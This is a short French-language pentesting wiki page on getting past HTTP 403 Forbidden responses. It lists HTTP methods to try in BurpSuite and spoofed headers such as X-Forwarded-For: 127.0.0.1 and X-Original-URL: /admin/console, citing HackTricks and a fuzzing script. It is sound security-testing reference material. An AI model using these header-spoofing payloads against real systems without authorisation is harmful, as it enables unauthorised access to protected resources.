# [Exploitation/Web] Bypass 403

## Introduction

Il arrive parfois que certaines ressources soient protégées sur des applications web et que lorsque vous essayez d'y accéder, vous obteniez l'erreur **403 Forbidden** .

Dans ce cas précis, il est parfois possible de contourner les sécurités mises en place pour quand même accéder à la ressource.

## ![image.png](https://wiki.neopipe.fr/uploads/images/gallery/2024-02/scaled-1680-/i5uimage.png)Source

- [Hacktricks - 403 &amp; 401 Bypasses](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/403-and-401-bypasses)

## Méthodes

Voici la liste des méthodes que vous pouvez essayer de modifier dans l'entête HTTP avec **BurpSuite** :

```
GET
```

```
HEAD
```

```
POST
```

```
PUT
```

```
DELETE
```

```
CONNECT
```

```
OPTIONS
```

```
TRACE
```

```
PATCH
```

```
INVENTED
```

```
HACK
```

## HTTP Headers

```
X-Originating-IP: 127.0.0.1
```

```
X-Forwarded-For: 127.0.0.1
```

```
X-Forwarded: 127.0.0.1
```

```
Forwarded-For: 127.0.0.1
```

```
X-Remote-IP: 127.0.0.1
```

```
X-Remote-Addr: 127.0.0.1
```

```
X-ProxyUser-Ip: 127.0.0.1
```

```
X-Original-URL: 127.0.0.1
```

```
Client-IP: 127.0.0.1
```

```
True-Client-IP: 127.0.0.1
```

```
True-Client-IP: 127.0.0.1
```

```
X-ProxyUser-Ip: 127.0.0.1
```

```
Host: localhost
```

```
X-Original-URL: /admin/console
```

```
X-Rewrite-URL: /admin/console
```

<p class="callout info">Pour tester toutes ces en-têtes automatiquement, vous pouvez utiliser le script **[fuzzhttpbypass](https://github.com/carlospolop/fuzzhttpbypass)**.</p>